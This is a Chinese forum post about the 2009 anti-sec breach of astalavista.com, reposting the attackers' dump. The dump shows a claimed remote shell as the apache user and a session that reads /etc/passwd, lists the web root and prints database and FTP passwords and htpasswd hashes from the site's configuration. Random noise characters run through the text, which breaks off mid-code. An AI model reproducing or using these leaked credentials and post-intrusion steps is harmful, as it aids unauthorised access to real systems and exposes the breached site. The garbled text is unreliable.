里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
. c" a+ i5 D* i* h3 }. ~8 \4 D* u/ _7 [
[root@front3 ~]# curl -I litespeedtech.com
, D1 ?! h5 G" J, LHTTP/1.1 200 OK
9 K8 R$ R8 p# W4 V4 ?Date: Fri, 05 Jun 2009 22:54:51 GMT# A, @/ \# L: ~1 \
Server: LiteSpeed
6 y. P" h. y1 Q+ M }+ o7 v: Z7 d! q1 W4 m
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-: p; g( r. N7 f& K! Z1 ]+ ?; p
: k6 f, ?9 T7 Z! t有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。3 _8 g( d6 w u' R. ?: W: V/ {
5 H( c; `( E( B$ B& A, y g: Y R
( J( s! s( L* K7 z4 r1 ]
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
2 \# e) `1 q' A: }$ g/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \. a/ L$ O; _9 [% p
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \8 r: ]2 l8 B# k3 D3 L6 {
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /9 d/ P# s1 z9 p( C
\/ \/ \/ \/ \/ \/ \/; c9 E9 U* y2 @# K I+ {8 ?
The Hacking & Security Community/ k' @5 E" A0 P/ R* _ u
[+] Founded in 1997 by a hacker computer enthusiast, _* z5 s, e l* B( M2 j
[-] Exposed in 2009 by anti-sec group; ~" V5 _, d4 d8 c% l
! ^# ?3 L/ u8 d) I$ f/ V/ l I
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
" S" c4 W( x$ k>> 03. Who’s behind the site?
6 i# E: f( y# x/ z E$ K6 x>>8 d5 X/ B: G) K4 T3 P5 x
>> A team of security and IT professionals, and a countless number of contributors from all over the world.6 E* I( b/ P2 k. U; C
9 g. V* k6 J% e& N7 A/ b
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?: F9 f3 T& n( K8 w2 y$ @$ w1 R1 n
>>, q- \+ k/ V" I4 {
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and7 P4 W6 [" O0 D* C& |( [
military institutions.
8 Z0 [ U( {% R) \! Q9 Y2 }4 h3 _>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
' r. I# o' d3 d1 [7 c6 G$ j: k# q& d4 x* i$ ^ ~
Why has Astalavista been targeted?4 d/ e" v" _) c t
% y7 t& f9 ?: @5 @1 T+ X9 Y
Other than the fact that they are not doing any of this for the “community” but
6 I# r( @; o1 ?) ?/ S. Wfor the money, they spread exploits for kids, claim to be a security community0 H6 K& b4 I2 E
(with no real sense of security on their own servers), and they charge you $6.669 P4 X" t6 ?8 {
per months to access a dead forum with a directory filled with public releases2 C" X- _2 z: a- u
and outdated / broken services., e- U5 }# Y* e0 T# N0 s7 v# R
4 X: H' K' H$ n% K# A0 SWe wanted to see how good that “team of security and IT professionals” really is.
6 U6 O) y$ F6 D& s( @
. Q1 P$ H1 \' p5 Q7 ZLet’s begin.$ D# a( G7 B) }9 U1 S$ i4 b
3 q% `) t7 a1 ^- q2 U" S- ]
anti-sec:~# ./g0tshell astalavista.com -p 80
0 w# h4 p) T- ~: \4 A- G. h; T7 n: R[+] Connecting to astalavista.com:80
; T/ _9 v1 ]) Z, o, \8 s[+] Grabbing banner…% A; S/ w- ^+ J! ]
LiteSpeed
2 E" m7 U G# n* P( L9 H[+] Injecting shellcode…9 J4 h* [# ~4 G( Q
[-] Wait for it! _5 e) Q, Z( K [3 q# b' x
* a' Y2 v0 Z& X) U- ^! ^
[~] We g0tshell, U$ c6 ]2 {2 q9 c1 N
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
9 [8 E$ x( B! M5 Q4 OID: uid=100(apache) gid=500(apache) groups=500(apache) o' Y( n3 _+ V4 `% Q' d
7 \" b. t1 {5 _7 a5 F
sh-3.2$ cat /etc/passwd' K& f d" J: Y3 T! o2 W3 O8 C& T1 C
root:x:0:0:root:/root:/bin/bash
9 b5 Q! o/ Y+ jbin:x:1:1:bin:/bin:/sbin/nologin
6 ^) c) m# _1 } Ydaemon:x:2:2:daemon:/sbin:/sbin/nologin2 C2 i1 l9 p9 C3 t8 @
adm:x:3:4:adm:/var/adm:/sbin/nologin
- y! z3 R4 u7 Z$ wlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin! A# G- k8 [7 |" S' i4 N+ D4 T' W
sync:x:5:0:sync:/sbin:/bin/sync/ ]. O: v( [; Y0 {2 W: X9 C& T) S- S
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
" g ~& A/ a" [. }halt:x:7:0:halt:/sbin:/sbin/halt
8 g. k7 N2 s b' u" r3 l" j; H+ zmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
, C3 Z1 b! W3 {! Z3 s! Dnews:x:9:13:news:/etc/news:7 }9 z1 P; f+ W; S" }
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin! L% I6 m# h7 P! p
operator:x:11:0 perator:/root:/sbin/nologin$ \4 j* s- l& R% H' K
games:x:12:100:games:/usr/games:/sbin/nologin/ P% S. g1 d3 i* z
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin# C. |" K/ @6 g! F
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
% U* q; `# u2 ~& _& @0 Znobody:x:99:99:Nobody:/:/sbin/nologin
0 h) l* |$ |8 T/ U5 Srpm:x:37:37::/var/lib/rpm:/sbin/nologin
, K. f2 i8 a8 q/ bdbus:x:81:81:System message bus:/:/sbin/nologin
( H. ~# X% q0 }: V+ D) Cnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
5 ]8 |! r# T8 A. _1 ]mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin4 E3 O& e, A) Y
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin4 P: I! u7 s; K" Z
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
( T3 |) Z9 R: l, E! chaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
) U% \7 X4 O2 Z# M+ H1 j7 z' p7 z# Orpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
9 E2 ]& W. Z" \* d+ t& S* j3 f" Orpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
9 Q$ H! X# P5 g- l( h; rnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin" Y; \% @( ?! ] K; h1 `4 ]
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
" t. l$ G# ]+ v7 P* d% hpcap:x:77:77::/var/arpwatch:/sbin/nologin
) ~5 b$ j" w$ t8 i% _+ E4 Pnamed:x:25:25:Named:/var/named:/sbin/nologin/ I$ x/ R/ O7 G# b; V4 q$ `
apache:x:100:500::/var/www:/bin/false
0 ^- a% ^& H9 ^) s \8 C9 vdiradmin:x:101:101::/usr/local/directadmin:/bin/bash# E, M) S- Y; b, B! T
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: ^$ L& y, q8 p& s/ Y8 @% Zwebapps:x:500:501::/var/www/html:/bin/bash8 m" l/ T% ]8 J0 e1 [+ P$ {+ Q
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
7 \' S! T6 \' C0 h C$ badmin:x:501:502::/home/admin:/bin/bash+ z6 m3 R8 t! E
jon:x:502:503::/home/jon:/bin/bash' h5 m' u, w s0 H
com:x:503:504::/home/com:/bin/bash7 i& K7 E" o) `! q& r
ntp:x:38:38::/etc/ntp:/sbin/nologin; Z% H1 S* F. ^
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
0 h' m- C. N v# j( S( E" `astanet:x:504:505::/home/astanet:/bin/bash. c0 f& ?& g" D# G, i/ v
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
% k7 Q# E* y2 P4 Q) D7 {0 N, _avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin' i) q- A4 ~/ n4 B+ k
7 `+ g% R, Z! F- v% `
sh-3.2$ cat /etc/hosts& b# U$ k9 U& C% q9 Q' ]% _
# Do not remove the following line, or various programs6 x/ h3 C- g- N( B5 Q
# that require network functionality will fail.
& d k; t& u4 f( |4 Z127.0.0.1 localhost.localdomain localhost
; w# X9 f, x& r, ^::1 localhost6.localdomain6 localhost6
9 U4 ?7 f, y4 N! j8 H7 a80.74.154.172 asta1.astalavistaserver.com
. o$ X! G$ b, R! g4 I0 S ]- _! C7 o" l
sh-3.2$ pwd
8 ]; e4 M6 f- I* f: X; N3 E% j/home/com/public_html
$ _9 c6 x) [1 ]1 N" F
' Q# o) ]6 ~! r) g6 D, h }" g' ^sh-3.2$ ls -la
; s a9 T1 d2 f: o6 _! w9 Mtotal 18460
" w: E7 b2 |' X2 G0 ], |& qdrwxr-xr-x 30 com apache 4096 May 28 17:06 .! P+ x& @/ j8 H$ \6 M
drwx–x–x 11 com com 4096 Jun 25 2008 ..
) |) p; ^/ K- o$ a- [drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
% m9 U5 I; S2 h" C; j1 _drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
0 K+ ~+ E! k6 u4 X6 rdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin K4 E. b$ q1 l/ p8 v
drwxrwxrwx 2 com com 4096 May 19 00:50 config, p; @9 L# Y, J2 p2 O0 f( [
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
% R9 X1 f3 j0 u( Rdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules5 S. j* K0 q1 r5 N
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
8 z. z8 p8 F' U5 b* _drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
2 i3 t8 E; s( M" ]drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__4 m3 d! Y. N: Z* m( {% @7 [
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
R1 g3 |) Q; l0 C* Kdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd! ]$ a% P6 }/ ]1 A7 Z
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor/ X* G7 ^4 Q8 @* g8 S2 |
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico; J) m1 p2 [/ D5 ~9 ]8 |1 \9 M
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed; u, w0 w9 P+ L
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess2 \( u- m I+ o9 {- v( ]1 K
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak7 L* T8 `3 i( A8 b, A$ p
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak: i: R! x$ a2 d$ i
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool( z( X, j! \% L+ u) |# e9 `+ t
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images& w X2 g5 h3 A2 y% l6 {
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
# T4 P2 }4 \! Xdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
6 L c# q i; Hdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang# C7 c8 O6 s8 S2 y6 X
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
# O: @6 a' W: c" x mdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media, d) ]- k% i4 ?6 Y1 s
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications- ^3 P! H; Z+ w- O* D* i
drwxr-xr-x 34 com com 4096 May 28 16:30 modules! l. j# i9 W" }2 I! E# R% {) r
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin; B: z0 w- J" Q. t. }2 B( X
drwxrwxr-x 22 com com 4096 May 28 17:06 _new9 y1 L# o/ ^; |( J1 k( T# b
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
7 i$ W& u4 {+ p: c; }" T! b8 Vdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
3 H8 @) {$ t v( z/ c6 f. S+ xdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy3 v8 T9 I; P( Z8 Q
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
+ {) E6 p& R/ g. a1 ]$ J N-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml3 h6 I: ^- D& _. U, \3 [
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
9 ^3 E5 K1 z# c4 I s# u' }9 Mdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- z, W9 l7 [" Zdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
7 L: j( W7 d5 W( z1 |drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam* C( S! S5 i$ f9 {+ n6 e
/ ?/ g! }0 P2 C- n2 I% e9 ~( f5 P2 {
sh-3.2$ head -20 index.php
5 w# n# ^$ \; ~<?php
$ ~+ x" Z) Z# U ]4 [0 @. z+ L
) c: X$ `. ~- ?6 F5 U- H6 s/**. x: c {7 f( W( n
* The main page for the CMS d* B$ u! _& F0 I+ L
* @copyright CONTREXX CMS - COMVATION AG- ?. U& B' @& t: a
* @author Comvation Development Team
# r8 n; R: M |; j9 U% H* @version v1.0.9.10.1 stable
L" _; A& O" V# f2 S* @package contrexx
" `( w P. b6 ~6 @% R: Y& t: x* @subpackage core9 ]9 q& ~6 ]# J
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
$ s% ~$ m& x' [ M; c- C* @since v0.0.0.0
& `# z X4 [+ p9 D1 d+ t. C$ |0 ]* p* @todo Capitalize all class names in project
" G4 o3 z O6 a% y* @uses /config/configuration.php
* W0 ~/ B/ H1 y4 O* @uses /config/settings.php
, Z$ ?& b/ f/ Q( h* @uses /config/version.php2 X7 f7 }; Z" o
* @uses /core/API.php( t' J Q# b# j P& x
* @uses /core_modules/cache/index.class.php
$ A+ r; G. S0 t* @uses /core/error.class.php
8 Q3 G9 @* O, C: Y* @uses /core_modules/banner/index.class.php6 i/ M2 e, C) w* r- _" v- }# E
* @uses /core_modules/contact/index.class.php
& b' D: w( W2 Z% C6 P* } `' ]& r" Q
sh-3.2$ cd config/9 [7 ?8 ~: p% Y; C8 o
sh-3.2$ ls -la; z$ e8 g' @* q+ J D# Q
total 32+ ^; }: w& s) p$ F, r
drwxrwxrwx 2 com com 4096 May 19 00:50 .
7 U8 b& ^/ \$ E" ydrwxr-xr-x 30 com apache 4096 May 28 17:06 ..& e& U$ o1 K- y! }# N7 M3 f0 m& c
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
' ~ j8 N- |7 D! [7 @-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! @5 p3 o) [$ |& r+ V
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
' h# T$ W3 O& B! [( c. [, T-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php# r1 I0 g! z2 z$ o n4 t5 u
5 r( w( x X0 Y7 a4 t1 Ysh-3.2$ cat configuration.php' @+ a/ g k! x) g; T
[snip]
* N& R- D, h) Z+ i- @5 |+ ]: w) ?$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
# P- {9 @2 B+ M3 N$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
8 }; e% X& m4 _+ w9 G( A' e& W% R0 h$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
9 F0 c9 A0 E* L7 u+ C0 a7 E4 _* @$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username: }% i2 t3 W! u0 [3 _" O
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
% d3 G) J+ g+ M$ W$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
5 W& D* T6 i/ T1 n$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..) k- ^0 O9 ~3 Z' M; U8 x) h8 L2 Z# P
[snip]) Z; C2 ~: A, ~: u7 x( o5 j4 M) S
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
r( H: S* q1 O8 L( c$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode' K1 V5 K$ G+ C3 p* I( t( b+ P
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
+ D& U5 I. w' D1 A# X% d7 ?! i$_FTPCONFIG['port'] = 21; // Ftp remote port1 |8 f7 ]# e. z% h" W& r
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username7 f. Q, q1 M6 a1 G3 h+ Z' p
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
/ w/ q* Q5 K" T' s$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
8 p e& K2 F; ~9 { {% o% h
+ X" X+ B! O" l$ Jsh-3.2$ cd ..5 w: ]' i* \8 F8 U! {' o
sh-3.2$ cd dvd/3 ]6 R# o0 m. m; z7 L T( u
sh-3.2$ ls -la
: T7 L5 S6 k8 k+ Q9 `) {total 2913780
- v# N& o0 I: J7 m' _drwxr-xr-x 2 com com 4096 Sep 9 2008 .
, r5 {/ _7 k6 B1 idrwxr-xr-x 30 com apache 4096 May 28 17:06 ..7 G. O; y m1 x
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar: o0 m- Q8 x2 u9 M
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar3 n( D \* l# ~. k: O4 ]
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar6 H* w# a3 ~# r! I8 Q* b
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
( z* T9 g4 J, ?* n, p7 c$ J9 A0 D6 p4 m! o- `5 G! M( H5 T
sh-3.2$ cat .htaccess
- Z, {& j2 E$ ~3 M4 XauthType Basic
, ~! f: Q4 d. ?6 ]3 I) d" y0 X8 h4 `authName DVD) z+ [ B# `$ u" W; E& k
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
& S5 |& ~; C, ^8 T3 \require valid-user
5 [) K, a' `' V0 ?% {. m& w8 \4 R6 u9 a) l2 t, C, p, k
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
% C/ l, z1 n3 Q9 `, h7 {DVDdownload:CRD8cuY6.MPT6
5 P: a) s' i, c$ ?9 }: QDVDdownload2:CR8a36.wluFMg% J) \0 J7 B0 S. p
# Z$ N) z% L: ]# M* U- e
sh-3.2$ cat test.php3 M( R$ H2 t# y
<?php3 `$ S& m, k& F" S
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;0 A/ P+ }! a. J9 p
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));! E( y, S$ a K4 j7 T) q9 p: [
echo $url;) r8 F4 u$ i6 {4 ~3 k/ S" O5 t
?>5 x! h! l9 P6 H% ]! }
9 G) x- J1 V; y2 V* E* rsh-3.2$ cd modifications/. ?. p h* E, h2 X" j7 x
sh-3.2$ ls -la
4 W0 w/ m: e$ g$ j& wtotal 32
- D' F! |0 T2 _8 R) {, m. Idrwxr-xr-x 8 com com 4096 May 11 12:48 .; Q+ p m2 F6 E" l) l0 t8 X
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 G+ H4 D/ K1 b6 a0 l
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
- i# C" l- ~9 n' U. D/ d7 }4 B, adrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs E6 L; g. ?3 L$ L% i( [" s% P
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools; z1 a3 k+ W' s0 T1 \
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
% }) T$ c7 Y+ |. i' idrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
* k! r- M2 p3 t( K1 J Wdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
4 c* ], g/ P/ K! S1 m) o$ a4 K( ?' x. M% P1 U" W( z: H
sh-3.2$ ls -R8 E2 Q2 e9 L4 @! s0 W# L2 @+ k
.:
6 p4 K+ ?( V2 H" A6 qcom_avtng cronjobs onlinetools pjirc search _tmp& Y& s6 R9 j4 {
- b- u' J7 v! l, r0 g8 j2 n
./com_avtng:
5 x4 k# ]! m* K6 s& R; U/ `1 H$ wavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts! O& Y! o$ M3 P+ _6 ^: K* L5 ]
( F% K! h0 ]$ b, c" i./com_avtng/scripts:+ Q) [1 _2 M; p1 Z# b
popunder.js
9 p' x0 r2 Q% ?) W* k! F4 O1 P: m$ K1 }- R& u
./cronjobs:, V! \0 P; K. p, \3 i8 I
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
_! K1 [% x4 p# H, H# H- x$ u! t4 [+ }" H& Q$ M
./cronjobs/tmp:3 ]0 _' G, T7 }/ N
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
* i( m" I q9 @+ D3 X; a7 M
2 z4 ?1 s( @, n+ u./onlinetools:
& W8 Z5 j) e9 d5 k, J3 N$ Q5 Gindex.php/ Y# ^1 V2 U+ H( h
$ C# R' v& ~+ c1 N/ n
./pjirc:- E' q1 `& w' L9 H3 v
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt, d% B L& s: }' V3 c2 Q4 \* G
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
4 o8 r! h+ _3 b; tbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
# [8 N+ R2 S' f5 f8 N) u: h5 U: y( T4 L
./pjirc/img:
9 U; P" q A% K+ m" I, d, Uange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif3 H# {7 _) s( L! B* D
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif ) Q: E" a) \# S" E1 `2 _
verre-eau.gif
( |. }4 }( |/ O6 bargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
; ^5 s2 e) ~' V% h# N% l- Mverre-vin.gif# o/ I O/ R" C' N- I
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
6 q% i" I6 V+ \) n4 E) u$ X: Dbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
6 G& }4 J6 Y1 \; S2 \: j' N/ ^0 u9 l+ V) x0 m
./pjirc/snd:
/ g7 u. g2 I- t! F/ D" lbell2.au ding.au
- _2 W7 }4 z6 l, C) W; [; d6 f
: q5 n+ k( ?: Z9 ~& K( S# D./search:' K/ L. N- I3 g
searchEngines.php search.php
2 z3 v7 e- |1 O9 ~& V
* T7 q$ n+ Z% [ o" O% B./_tmp:0 h; r. M" `" h' ~6 g* e" I; X: B
defaultPorts.php defaultPorts.txt% j- ]8 }+ E- ^' y5 w6 J+ `
6 V4 X( X+ i# I I7 o! W
sh-3.2$ cd cronjobs/
& G: _- C9 K! w# \- N4 s' k2 wsh-3.2$ cat exploits.php
/ f% @" @, z) J7 K+ t2 r[snip]
3 |" ~; Q( K* D4 G6 y/ o$categories = array();
& L* ?# }3 [; |# |$ w& ^+ _& w y$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
1 P0 F: n% G! s! R( z5 z9 N% Q$expolits = file($milw0rmFile); f2 N+ v& p8 M9 e% I- n( u1 c! I# g
$comExploits = array();
! n" e1 J/ v' _/ y[snip]) u6 R8 E3 _1 ~2 u1 f
// manage data5 D- C0 T+ Q, w: V# l% L
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
" D0 D8 {, `$ v+ w6 g) c; u. [- `% i
// get path and title3 _* e. V& Q$ w$ S5 s' U, V$ d
$expolits[$x] = trim($expolits[$x]);
8 M# i5 j5 x9 j/ ^ $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
* w+ C* b, ]+ e $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);2 u) i$ e. y% W3 t4 H9 R% `2 S* X& ]
# n G7 W3 b$ U7 j0 d+ ]; S
// check if file exists$ e- A- I/ a- i. Z3 S
if (file_exists($path)) {, y) O3 j1 H3 E1 o6 c5 G$ Q
* F5 s4 v( u( A( G# M1 |. `9 {* j
$text = file_get_contents($path);
) H" k3 I& x0 J, [( |8 P( G h$ C% D/ L0 S8 y
// get content and date5 x- G9 u; p5 O, a
//$text = htmlspecialchars($text, ENT_QUOTES);( H0 s" u9 T% F; c: ]8 W' ?/ Z* Y9 F
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));6 M! H" V/ L. S0 s! N; S) I# F
if ($tmptext != ”) {# z( w1 z( B- X) F& F. O; G
$text = $tmptext;1 Y% m( ^4 S' L
} else {, X9 {, @+ v( E6 b4 S2 d
$text = addslashes(htmlentities($text, ENT_QUOTES));( N2 a* O% u* }1 C% ^, U
}. K: V0 y5 C5 @9 N
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
" C U3 l0 s' a: } $tmp = explode('-', $date);
! S& ~+ [( J. s, X( { $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
# s& S; p5 P/ O2 m+ B0 S $cat = getCategory ($path);7 X! {, ]) c! S8 J$ _, ]: Y/ K$ Z
$ext = pathinfo(basename($path));$ [; P2 C* Z' v& @# F+ y
$ext = $ext['extension'];
7 R. ]8 Q# M7 P( }, T7 B $qStr = ”0 U- s+ o |4 j& G& z! l$ r& ]2 B
SELECT `id`
: J- c% w+ k6 w- _2 Y0 | FROM `contrexx_module_exploits`$ [# _" Y' H- Z$ P% L6 O
WHERE `title` = ‘” . $title . “‘5 o2 ]' ^8 e/ x& q. g j
AND `date` = ‘” . $date . “‘
& ^) s E+ @ N5 @+ y% L& [ “;
, p& M. |) ~& F4 Z) J echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
1 G# T/ l! C ~& d( y% J. y' F6 G3 S $q = $_objDB->query($qStr);
. h% A2 f* M2 n8 U/ [) ?: z8 w; }3 A3 g: V: Y8 c' b" r
if ($q->numRows() == 0) {
. ^7 U8 I' v# A) g6 g
9 a7 H+ d2 z. [# K, P8 ~ \ // prepare array" O/ S4 E B1 U) L
$comExploits[$x]['date'] = $date;
1 s6 n0 z* \# W6 V' a$ }7 S $comExploits[$x]['title'] = $title;
# g8 ]6 a, ]4 _ h $comExploits[$x]['author'] = ‘milw0rm’;
3 E8 n8 {7 ^) r( n( x$ Q $comExploits[$x]['text'] = $text;: ~! B) h$ q3 v. k, r
$comExploits[$x]['source'] = $ext;
4 k1 `: ?7 [; y# C2 w7 { c. B, A2 z $comExploits[$x]['url1'] = ”;" o; g% I; D o
$comExploits[$x]['url2'] = ”;+ u9 K* F) }" M/ _1 P8 ?! Y; X. X
$comExploits[$x]['catid'] = $cat;
% u( D3 w2 f e: r$ z $comExploits[$x]['lang'] = ‘2′;! d+ C5 k$ ]$ h+ K2 a. F5 n
$comExploits[$x]['userid'] = ‘12′;
' g w4 s' _$ x: t $comExploits[$x]['startdate'] = ‘0000-00-00′;
7 j4 Z, h) A6 v; R/ `8 x $comExploits[$x]['enddate'] = ‘0000-00-00′;
( C& S! w4 T& B4 \& r* U' r $comExploits[$x]['status'] = ‘1′;& S, j9 U7 ?, I2 b# M% V& _
$comExploits[$x]['changelog'] = $date;
$ F3 q; i- d* z/ c' n& g$ @7 k+ b) h# \7 F
}
( Z+ \! z; \8 D& D[snip]7 Z4 d+ |+ A: M0 M: H
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
$ m5 K) I& Q6 V5 c) G. _<rss version=”2.0″>+ n% a: j5 \2 T# k3 z+ G
<channel>9 j- ?2 c" {( F: h5 Z
